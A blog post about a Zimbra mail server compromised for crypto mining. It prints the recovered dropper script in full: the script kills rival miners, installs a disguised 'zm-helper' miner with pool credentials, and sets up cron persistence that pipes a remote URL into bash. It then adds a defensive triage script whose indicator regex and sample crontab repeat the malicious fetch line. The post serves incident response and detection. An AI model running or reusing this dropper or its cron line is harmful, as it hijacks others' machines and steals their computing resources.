Eric's Hexo Space

[Note] My Zimbra host seems to have been hijacked for crypto mining

This post was published 1228 days ago; its content may be out of date. If you have questions, please contact the author.

I recently discovered that my Zimbra host appears to have been broken into.

There were logs of root sending mail outbound, so I set always_bcc in Zimbra's Postfix to see what was actually being sent out.

It seems to be sent on a schedule via crontab, but I have checked every crontab under /etc and didn't see anything unusual..

The mail content is as follows:

From: Cron Daemon <[email protected]>
3:00 (5 hours ago)
To: zimbra

```text
/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh'
```
It fetches a file on its own and disguises it as a Zimbra system file, but that download link appears to be dead already and can no longer be fetched.

The contents of the downloaded file are as follows:

```bash
#!/bin/bash
# Kill competing miners and scanners so this one has the host to itself
kill -9 $(ps aux | grep "-B -o stratum" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "minerd" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "-B -c /" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "stratum" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "java" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "ssh-scan" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "/bin/sh ./start" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "zimbravm-cache" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "/bin/bash ./a" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "pscan" | awk '{print $2}') 2>&1
ARCH=$(uname -m)
# Binary and config are named to look like Zimbra helper files
BINNAME="zm-helper"
BINCFG="zm-helper.cfg"
# As root: install under /sbin and /etc; otherwise fall back to /tmp
if [[ $EUID -eq 0 ]]
then
BINDIR="/sbin/"
CFGDIR="/etc/"
BINPATH="$BINDIR$BINNAME"
CFGPATH="$CFGDIR$BINCFG"
fi
if [[ $EUID -ne 0 ]]
then
BINDIR="/tmp/"
CFGDIR="/tmp/"
BINPATH="$BINDIR$BINNAME"
CFGPATH="$CFGDIR$BINCFG"
fi
# Re-download itself and (re)install the cron job in the current user's crontab
if [ -f /opt/zimbra/data/tmp/.z.sh ]
then
crontab -r
wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT -O /opt/zimbra/data/tmp/.z.sh
cro='/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh'
# cron schedule field as it appears on the page
(crontab -l; echo "0 /3 $cro") 2>&1 | sed "s/no crontab for $(whoami)//" | uniq | crontab -
fi
# Stop any running copy, then replace the binary and pool config
k=$(ps aux | grep "[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}" | awk '{print $2}')
if [ ! -z "$k" ]
then
kill -9 $(ps aux | grep "[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}" | awk '{print $2}')
fi
[[ -f "$CFGPATH" ]] && rm -rf "$CFGPATH"
[[ -f "$BINPATH" ]] && rm -rf "$BINPATH"
(cat <<- EOF
{
"url" : "stratum+tcp://ltc.give-me-coins.com:3333",
"user" : "n0ts0me1ne.1",
"pass" : "zx1",
"quiet" : true
}
EOF
) > "$CFGPATH"
# Fetch the miner binary for this architecture and start it in the background
wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/m_`uname -m` -O "$BINPATH"
chmod +x "$BINPATH"
eval "$BINPATH -B -c $CFGPATH 2> /dev/null"
chk=$(ps aux | grep "[${BINNAME:0:1}]mod" | awk '{print $2}')
if [ ! -z "$chk" ]
then
echo "$chk"
fi
exit 1
```
First, back up and delete any files like these, then run
/opt/zimbra/libexec/zmfixperms --verbose --extended
to fix the permission problems.
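Two details of the incident are worth turning into a repeatable check. The dropper installs its job with `crontab -`, so it lands in the invoking user's own crontab spool (here the zimbra user, the recipient of the Cron Daemon mail) rather than anywhere under /etc, and the Cron Daemon mail above is /bin/sh rejecting the bash-only `<(...)` process substitution in that entry. The triage script below is an added example and is not part of the original post or of Zimbra: it flags crontab lines shaped like the dropper's, lists the artifact paths the script above writes (/opt/zimbra/data/tmp/.z.sh, /sbin/zm-helper and /etc/zm-helper.cfg for a root run, the /tmp variants otherwise), and looks for the `-B -c` argument shape in the process table. Only the paths and strings come from the dropper; the indicator regex, the sample crontab, the schedule values in it and the self-test are constructed here.

```shell
#!/bin/sh
# Added triage helper for the incident described in this note. It is not part
# of the original post or of Zimbra; the indicator strings and artifact paths
# are taken from the dropper above, everything else is an assumption.

# Extended regex built from the dropper's own commands: remote fetch into bash,
# process substitution of a downloaded script, hidden files under the Zimbra
# tmp dir or /tmp, and a stratum mining-pool URL.
CRON_IOC_RE='curl -ksL|wget -q|/bin/bash <\(|/opt/zimbra/data/tmp/\.|/tmp/\.|stratum\+tcp'

# Files the dropper writes: root run (BINDIR=/sbin, CFGDIR=/etc) or
# unprivileged run (both under /tmp), plus the re-downloaded .z.sh.
ARTIFACT_PATHS="/opt/zimbra/data/tmp/.z.sh /sbin/zm-helper /etc/zm-helper.cfg /tmp/zm-helper /tmp/zm-helper.cfg"

# scan_cron_text: read crontab text on stdin, print lines matching the
# indicators. Comment lines are dropped first so a commented-out entry does
# not count as a live job.
scan_cron_text() {
    grep -v '^[[:space:]]*#' | grep -E "$CRON_IOC_RE" || true
}

# count_cron_hits: same input, prints how many lines matched (0 if none).
count_cron_hits() {
    scan_cron_text | grep -c '' || true
}

# scan_all_user_crontabs: on a live host, check every account's own crontab
# spool, not only /etc/cron*; the dropper installs its job with "crontab -"
# for whichever user ran it. Needs root for "crontab -l -u".
scan_all_user_crontabs() {
    while IFS=: read -r user _; do
        crontab -l -u "$user" 2>/dev/null | scan_cron_text | sed "s/^/[$user] /"
    done < /etc/passwd
}

# check_artifacts: print each known artifact path that exists. An optional
# prefix lets the same check run against a staging tree for testing.
check_artifacts() {
    prefix="${1:-}"
    for p in $ARTIFACT_PATHS; do
        [ -e "$prefix$p" ] && echo "$prefix$p"
    done
    return 0
}

# find_miner_processes: the dropper launches "$BINPATH -B -c $CFGPATH" and
# later greps for "mod -B -c"; look for that argument shape or a pool keyword.
find_miner_processes() {
    ps axo pid=,user=,args= | grep -E ' -B -c |stratum' | grep -v 'grep -E' || true
}

# Constructed sample crontab (not captured from the compromised host): one
# benign Zimbra job, one commented-out fetch, one entry shaped like the
# dropper's. The schedule values are made up.
SAMPLE_CRONTAB='MAILTO=zimbra
# disabled: 30 4 * * * wget -q http://example.invalid/update.sh -O /tmp/.u.sh
0 */3 * * * /bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh
15 2 * * * /opt/zimbra/libexec/zmbackup -f -a all'

# self_test: run the scanners against the sample and a staged .z.sh so the
# script demonstrates itself offline; on the real host call
# scan_all_user_crontabs, check_artifacts and find_miner_processes instead.
self_test() {
    printf '%s cron hit(s):\n' "$(printf '%s\n' "$SAMPLE_CRONTAB" | count_cron_hits)"
    printf '%s\n' "$SAMPLE_CRONTAB" | scan_cron_text
    stage=$(mktemp -d)
    mkdir -p "$stage/opt/zimbra/data/tmp"
    : > "$stage/opt/zimbra/data/tmp/.z.sh"
    printf 'artifacts under %s:\n' "$stage"
    check_artifacts "$stage"
    rm -rf "$stage"
}

self_test
```

On the compromised host, `scan_all_user_crontabs` run as root covers the spool the /etc check missed, and `check_artifacts` with no prefix reports the real paths; the commented-out `wget -q` line in the sample shows why comment lines are filtered before matching, so that a note left in a crontab does not raise a false hit.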

That's about it for now; I'll find another day to reinstall the whole thing.
